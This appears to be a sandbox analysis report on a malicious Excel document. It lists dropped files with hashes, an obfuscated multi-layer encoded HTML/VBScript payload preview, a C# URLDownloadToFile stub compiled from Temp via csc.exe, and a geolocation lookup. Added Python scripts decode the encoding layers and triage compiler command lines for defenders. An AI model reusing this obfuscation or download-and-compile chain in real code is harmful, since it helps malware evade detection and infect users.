                                              Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):0.34726597513537405
                                              Encrypted:false
                                              SSDEEP:3:Nlll:Nll
                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                              Malicious:false
                                              Preview:@...e...........................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                              Category:modified
                                              Size (bytes):150707
                                              Entropy (8bit):2.0237819490676623
                                              Encrypted:false
                                              SSDEEP:96:Ea+Cw77d4BqFbzuBqFwaXSGFvLjuKGBqFTzbT:Ea+Ck7E4bg4wXGk4TnT
                                              MD5:4FA3C9C0821D023F37A022E02D3C5A63
                                              SHA1:5C793E304F7B37FB0AB3DBE03526DB9AB42765A8
                                              SHA-256:6F5854648EE6114AAE0E2636287B4415A80D15D6CC1126568FB2FEDA06F06A16
                                              SHA-512:149B1D5AE609455FCF86533719737FEBE6AB13343B8A4FACEA6093FBB1677F1A5F812A312BC95433C131636AF024512E25B5D49EAE665BF66EB2F7DB4E70772E
                                              Malicious:true
                                              Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%252520language%25253DJavaScript%25253Em%25253D%252527%2525253C%25252521DOCTYPE%25252520html%2525253E%2525250A%2525253Cmeta%25252520http-equiv%2525253D%25252522X-UA-Compatible%25252522%25252520content%2525253D%25252522IE%2525253DEmulateIE8%25252522%25252520%2525253E%2525250A%2525253Chtml%2525253E%2525250A%2525253Cbody%2525253E%2525250A%2525253CScript%25252520laNgUAGE%2525253D%25252522vbScRiPt%25252522%2525253E%2525250ADiM%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%25252520%2
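The HTML file modified by EXCEL.EXE above is a chain of document.write(unescape("...")) wrappers, each percent-encoded one level deeper than the one outside it (%3C, %253C, %25253C), ending in a JavaScript stage that keeps the decoded page, including a vbScRiPt block, in m='...'. The script below is an added example for triaging such a file; it is not part of the sandbox report. SAMPLE is constructed inside the script to mirror that layering and is not the dropped file itself.

```python
"""Peel nested document.write(unescape("...")) wrappers.

Added analysis example, not part of the Joe Sandbox report. SAMPLE is
constructed here: three document.write(unescape(...)) layers around a final
JavaScript stage that stores a percent-encoded HTML/VBScript body in m='...'
and writes it with unescape(m).
"""
import re
from urllib.parse import quote, unquote

# A quoted literal made of percent-escapes (at least one) and other
# non-quote characters. Requiring an escape stops the loop from "decoding"
# ordinary attribute values once the real payload has been reached.
_LITERAL = r"""(["'])((?:[^"'%]*%[0-9A-Fa-f]{2})+[^"'%]*)\1"""
_UNESCAPE_ARG = re.compile(r"unescape\(\s*" + _LITERAL + r"\s*\)")
_STRING_ASSIGN = re.compile(r"\b\w+\s*=\s*" + _LITERAL)


def peel_layer(text):
    """Decode one wrapper. Returns (inner_text, True) or (text, False)."""
    match = _UNESCAPE_ARG.search(text) or _STRING_ASSIGN.search(text)
    if match is None:
        return text, False
    return unquote(match.group(2)), True


def decode_layers(text, max_layers=32):
    """Return every stage from the outer HTML down to the innermost payload."""
    layers = [text]
    for _ in range(max_layers):
        inner, found = peel_layer(layers[-1])
        if not found:
            break
        layers.append(inner)
    return layers


def innermost(text):
    """Shortcut: the last decoded stage."""
    return decode_layers(text)[-1]


# ---- constructed sample input (not the real dropped file) ----
FINAL_HTML = (
    '<!DOCTYPE html>\n<html>\n<body>\n'
    '<Script laNgUAGE="vbScRiPt">\nDiM x\n</Script>\n'
    '</body>\n</html>'
)
# Last stage: m='...' holds the encoded body, written via unescape(m).
LAST_STAGE = (
    "<script language=JavaScript>m='%s';"
    "document.write(unescape(m))</script>" % quote(FINAL_HTML, safe="")
)


def wrap(payload, depth):
    """Add `depth` document.write(unescape("...")) layers around payload."""
    text = payload
    for _ in range(depth):
        text = ('<script>\n<!--\ndocument.write(unescape("%s"))\n//-->\n</script>'
                % quote(text, safe=""))
    return text


SAMPLE = wrap(LAST_STAGE, 3)

if __name__ == "__main__":
    stages = decode_layers(SAMPLE)
    print("layers:", len(stages))
    print(stages[-1])
```

On a real dropped file, read it as text and pass it to decode_layers; the returned list keeps every intermediate stage so each can be hashed and compared against the report's other dropped files. The literal regex deliberately refuses strings with no %XX escape, so the loop stops at the decoded page instead of "decoding" attribute values such as content="IE=EmulateIE8".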
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):194206
                                              Entropy (8bit):3.8801703450865306
                                              Encrypted:false
                                              SSDEEP:3072:7merF4nF3I2A7lE9QVBpEE8gt5pdGwpgCGy8/tpmqDyJVvnpUcFoqszc:7JrF4VI9lE9aGOVvnpUcFoqszc
                                              MD5:9E0D5ADD50B62609B0D1A62A2B51B13A
                                              SHA1:6D23598F979CF1E8815A0AF91D68249E36272DFC
                                              SHA-256:E06A1DD0178864407F0E0BD4BC036E56B1D943AA07EAA743432FF16A70F38365
                                              SHA-512:F72E53232F1F382800DDA2536DCA4D8345F4B24F156CC41E8DC4DF3074908A51043F27B4B5E4A67F9BB577B9334C62C8D7CDE3D5D7E9B1D136E818822FBDF1DA
                                              Malicious:false
                                              Preview:..u.W.b.G.g.W.l.m.G.L.i.f. .=. .".P.W.z.f.W.P.p.U.z.i.N.q.".....u.p.L.O.c.z.Z.W.p.L.W.d. .=. .".L.W.W.O.W.W.W.k.a.G.v.n.".....W.L.j.i.A.H.x.U.p.m.K.U. .=. .".L.o.Z.U.h.i.e.e.A.G.u.K.".....b.m.q.c.W.b.H.K.b.k.i.B. .=. .".t.L.z.n.j.m.N.G.e.A.A.i.".....A.A.o.L.a.Z.N.W.N.e.L.h. .=. .".d.G.a.A.N.e.G.q.m.l.J.b.".....P.U.k.r.R.K.U.b.x.N.o.m. .=. .".e.o.h.G.c.e.l.c.h.H.o.I.".....K.W.N.I.P.u.L.L.Z.u.p.C. .=. .".L.i.h.f.g.m.q.z.i.L.L.L.".....T.v.P.n.z.k.A.B.a.p.x.P. .=. .".P.W.C.x.U.Q.K.G.i.f.a.O.".....U.c.L.t.c.m.L.N.p.m.v.W. .=. .".z.W.L.P.S.L.L.a.s.s.L.L.".....c.x.R.x.K.t.a.U.O.z.o.W. .=. .".G.q.C.z.G.c.b.L.N.T.Z.k.".........U.L.A.C.x.G.W.W.c.G.m.Z. .=. .".Z.g.u.C.i.K.L.W.e.o.K.p.".....W.K.h.J.W.K.k.q.Q.R.u.x. .=. .".x.k.L.W.C.U.c.N.b.f.b.d.".....x.L.P.O.h.d.u.L.U.b.o.g. .=. .".L.K.Z.p.m.P.W.K.L.L.L.c.".....P.m.g.L.O.u.W.h.R.l.L.O. .=. .".Z.o.A.n.k.x.b.e.t.G.W.e.".....T.R.A.p.i.o.G.k.n.c.k.c. .=. .".k.L.i.L.i.d.R.S.n.J.h.P.".....b.q.b.b.U.Z.u.B.k.o.H.o. .=. .".z.W.k.Z.W.W.W.L.e.o.W.e.".....i.
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):962
                                              Entropy (8bit):5.013130376969173
                                              Encrypted:false
                                              SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                                              MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                                              SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                                              SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                                              SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                                              Malicious:false
                                              Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):1603716
                                              Entropy (8bit):2.953046890038694
                                              Encrypted:false
                                              SSDEEP:3072:64rlPwsVb7ooxv+7/jJID1DQ0L97dH+vUCx8vb1:HrlYav+7V21DR97devUCx8b1
                                              MD5:ABAF8DE622835088D16EC41609B17D8D
                                              SHA1:56E9544505F803F3B904B67EC97B11FBD80E0F42
                                              SHA-256:EFD243C39B128410ED530DF9F54D0443E907A35C4928A7955F9459F472119F62
                                              SHA-512:C334535301CECAF8AE50A08026FBAECC5368EFD264BE4BF548B8B90263F0D3217CF7DB73BB12B4259A6F957FF9957526BBCE1A8AA87247E36E37F10C1AD43D06
                                              Malicious:false
                                              Preview:....l................................5.. EMF.....x...%......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 9 15:49:02 2024, 1st section name ".debug$S"
                                              Category:dropped
                                              Size (bytes):1328
                                              Entropy (8bit):3.9661392393731845
                                              Encrypted:false
                                              SSDEEP:24:HZe9ERjOoKdHfFwKdNWI+ycuZhNRiYakSmiNPNnqSqd:P/yeKd41ulR5a3mSqSK
                                              MD5:20066545782812EB5254B4A3B2AEDF98
                                              SHA1:43540AE3A41426193D1899FDD6F85B9C403AF8ED
                                              SHA-256:658E9250BE98A46EDD9CAFD52B0ECAE60CAB5E53AA9298A6C741563CB774D114
                                              SHA-512:BCFFDDB9876C643423C27410A59D899CD81ACD76C51C7E2DB89D7E0539D988A65014986223DC98A5BBA15520829DC746900695CFB10FDA1674A633EDE5BEA522
                                              Malicious:false
                                              Preview:L......f.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\sepiowy3\CSC80F6A6947D640689146C75DBBC3F89.TMP..................p.Hf..y...$n:oz..........4.......C:\Users\user\AppData\Local\Temp\RESE61B.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.e.p.i.o.w.y.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x01bb010a, page size 32768, DirtyShutdown, Windows version 6.1
                                              Category:dropped
                                              Size (bytes):21037056
                                              Entropy (8bit):1.1363830034622442
                                              Encrypted:false
                                              SSDEEP:24576:Nj1U91o2I+0mZ5luHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:NjEXILuHqqEXwPW+RHA6m1fN
                                              MD5:22F9F88F9FF9D0D438FAA48971C4A07A
                                              SHA1:C8C202340DB73392805CAD92B29845D83D942290
                                              SHA-256:A39C9D72F6B2FAF9B0A80E85C398DABD86E5165CDBA56D1CFAA4F91BDB601832
                                              SHA-512:CFC62B5C6F5C45F5AF97F2FE138ECE5EE29CFDDBA602F9208FB97171EC37E0EEE84A3D18E6FEEE4CE383C246A4A229E57DBCA3A3D8FB38C820E2A39D8C083C74
                                              Malicious:false
                                              Preview:....... ........................u..............................;:...{..51...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview:1
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                              Category:dropped
                                              Size (bytes):2
                                              Entropy (8bit):1.0
                                              Encrypted:false
                                              SSDEEP:3:Qn:Qn
                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                              Malicious:false
                                              Preview:..
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              File Type:MSVC .res
                                              Category:dropped
                                              Size (bytes):652
                                              Entropy (8bit):3.0900151259160236
                                              Encrypted:false
                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryjWlYak7YnqqmWlNPN5Dlq5J:+RI+ycuZhNRiYakSmiNPNnqX
                                              MD5:9170AF4866B01A79CA14AA246E3A6F7A
                                              SHA1:B195C7FAC11653FA16F6EBDEFB79D2BB3B7EBD18
                                              SHA-256:CAEE4161E971DA6CA924F9A9B146F8C4018DF171CCDEB6BD4AE0AECF9184F380
                                              SHA-512:55DCC65ACA409EC658C7F6073954E81DD995E494FC3F3D2D5BABF3F1A68943E3C726E132F444EACCBEBE58F892CED9052BBE7F0CC298C4D0C65C1271B5061C26
                                              Malicious:false
                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.e.p.i.o.w.y.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.e.p.i.o.w.y.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (360)
                                              Category:dropped
                                              Size (bytes):477
                                              Entropy (8bit):3.9535799752349936
                                              Encrypted:false
                                              SSDEEP:6:V/DsYLDS81zuyPN+fVMmF/QXReKJ8SRHy4HiJc9KLmTZf/pdKy:V/DTLDfuyF+fTIXfHB9KLUTdKy
                                              MD5:63CEB7F519AD8F581A2F665735F3E246
                                              SHA1:0A20545386E9E8A09253332A58CCFE04F110A14D
                                              SHA-256:C156E735CBE6510CD32E91C531258E4BABF07E441CC434F0DFABCE95053C2ED5
                                              SHA-512:79B5E8E06A295CFAEBC59F06E339EE6073C01AC007390E39D16E076003ACDBEC68FC724D3695B6B0DCFACAE746BE3F763C123B35CAAB0EF48FBEB3F831F45071
                                              Malicious:false
                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace YSQd.{. public class IEGAIItDM. {. [DllImport("Urlmon.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr aTZZJyGfA,string EZNvRTw,string mPEPBJREUJ,uint FFy,IntPtr aIMfbwlDpV);.. }..}.
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                              Category:dropped
                                              Size (bytes):369
                                              Entropy (8bit):5.180774798416366
                                              Encrypted:false
                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fLp0zxs7+AEszIP23fLrH:p37Lvkmb6KzKWZEofH
                                              MD5:AB82CF1560C6AD08F56EF4B239765EB2
                                              SHA1:244F48C54CF3B487C7566E9A1CA648ECCD42F787
                                              SHA-256:9593293FE8DAC4EDA9D710CF1BA1E16863C4D9D17A43436F4BC5E6F8B5535E8B
                                              SHA-512:93746B5E07B8DE27BCEC51F62D152A3E94E898A276C7A95BA6905468436E317E7BFD66D2A22F204043EAC4B356383117A394550641B0AC68075288A09B41BF9D
                                              Malicious:true
                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.0.cs"
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):3072
                                              Entropy (8bit):2.8654393562973777
                                              Encrypted:false
                                              SSDEEP:24:etGSLp2YYnl8sNgkdq5yBmgtkZfLdxq4lWI+ycuZhNRiYakSmiNPNnq:68Y8+yqlHJLzqF1ulR5a3mSq
                                              MD5:3ACE7B05982103A54C9A95B291145C17
                                              SHA1:175BFF9DE0C4C60DA5BA31D8CDD6F91702EB7254
                                              SHA-256:B7548FF64B748F321F82FA48184FD6A3CDD2B3570FDA1EC0A07D4B50BF0098C7
                                              SHA-512:956D659689242B42A184AEA3D08556D8FA733372766178DCBC03D9E96F2A43E5CC35E86C7F1087DC939B3D228BF42DBB1873BE9691B13F3D5F7CFFCDA36CC73B
                                              Malicious:false
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........!.................#... ...@....... ....................................@.................................h#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......(...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.......................................!.............. =.....P ......O.........U....._.....g.....r.....v...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.se
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                              Category:modified
                                              Size (bytes):866
                                              Entropy (8bit):5.304377065785604
                                              Encrypted:false
                                              SSDEEP:24:AId3ka6KzrEofOKaMD5DqBVKVrdFAMBJTH:Akka60rEoWKdDcVKdBJj
                                              MD5:97029A2ADD9C8EE535A65BB5BBF5D914
                                              SHA1:12F4773C9ABCFCFA73D5770F2F5084D645A5862F
                                              SHA-256:36785551672E28353355220BA8B9B7684B074A95C43E977EBA830F955A1D220A
                                              SHA-512:A8A4490B6A85A3826A6D0415E4FC274BD1D665EEE79301BA1A1CA46B3E522CD31710B4008ECC6E518AD586A327EF9152BC52816CF83700C2437464F327501F99
                                              Malicious:false
                                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
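The three PowerShell-dropped files above (the .0.cs source holding a URLDownloadToFile P/Invoke stub, the .cmdline handed to csc.exe, and the compiler's output log) are the on-disk trace of Add-Type compiling C# through CodeDom into the user's Temp directory, which is what the "Dot net compiler compiles file from suspicious location" Sigma hit reflects. The script below is an added triage example, not part of the report; ADD_TYPE_CMDLINE is the .cmdline content shown above, BENIGN_CMDLINE is a constructed MSBuild-style invocation used as a negative control, and the USER_WRITABLE directory list is an assumption to be tuned per environment.

```python
"""Triage csc.exe command lines for the PowerShell Add-Type / CodeDom pattern.

Added example, not part of the Joe Sandbox report. ADD_TYPE_CMDLINE is the
dropped .cmdline file from the report; BENIGN_CMDLINE is constructed.
"""
import re

ADD_TYPE_CMDLINE = (
    '/t:library /utf8output /R:"System.dll" '
    '/R:"C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation'
    '\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" '
    '/R:"System.Core.dll" /out:"C:\\Users\\user\\AppData\\Local\\Temp\\sepiowy3\\sepiowy3.dll" '
    '/debug- /optimize+ /warnaserror /optimize+ '
    '"C:\\Users\\user\\AppData\\Local\\Temp\\sepiowy3\\sepiowy3.0.cs"'
)
BENIGN_CMDLINE = (  # constructed negative control
    'csc.exe /noconfig /nowarn:1701,1702 /target:exe '
    '/out:C:\\src\\app\\obj\\Release\\app.exe '
    '/reference:C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\System.dll '
    'C:\\src\\app\\Program.cs'
)

# Assumed list of locations a user-level process can write to; tune per estate.
USER_WRITABLE = (
    "\\appdata\\local\\temp\\", "\\windows\\temp\\",
    "\\programdata\\", "\\users\\public\\",
)

# A token is a run of non-space characters where "..." may embed spaces.
_TOKEN = re.compile(r'(?:[^\s"]+|"[^"]*")+')


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted runs together."""
    return [t.replace('"', "") for t in _TOKEN.findall(cmdline)]


def _option(tokens, *names):
    """Values of every /name:value option in tokens (case-insensitive prefix)."""
    values = []
    for tok in tokens:
        low = tok.lower()
        for name in names:
            if low.startswith(name):
                values.append(tok[len(name):])
    return values


def _user_writable(path):
    return any(d in path.lower() for d in USER_WRITABLE)


def triage_csc(cmdline):
    """Return human-readable findings for one csc.exe invocation (empty = nothing odd)."""
    tokens = tokenize(cmdline)
    findings = []
    for out in _option(tokens, "/out:"):
        if _user_writable(out):
            findings.append("output assembly written to user-writable path: " + out)
    sources = [t for t in tokens if t.lower().endswith(".cs") and not t.startswith("/")]
    for src in sources:
        if _user_writable(src):
            findings.append("source compiled from user-writable path: " + src)
        if re.search(r"\.0\.cs$", src, re.I):
            # CodeDom names its temp source <name>.0.cs beside <name>.cmdline/.out
            findings.append("CodeDom temp-file naming (<name>.0.cs): " + src)
    refs = _option(tokens, "/r:", "/reference:")
    if any("system.management.automation" in r.lower() for r in refs):
        findings.append("references System.Management.Automation.dll (PowerShell Add-Type)")
    return findings


if __name__ == "__main__":
    for label, cmd in (("add-type", ADD_TYPE_CMDLINE), ("benign", BENIGN_CMDLINE)):
        print(label, triage_csc(cmd))
```

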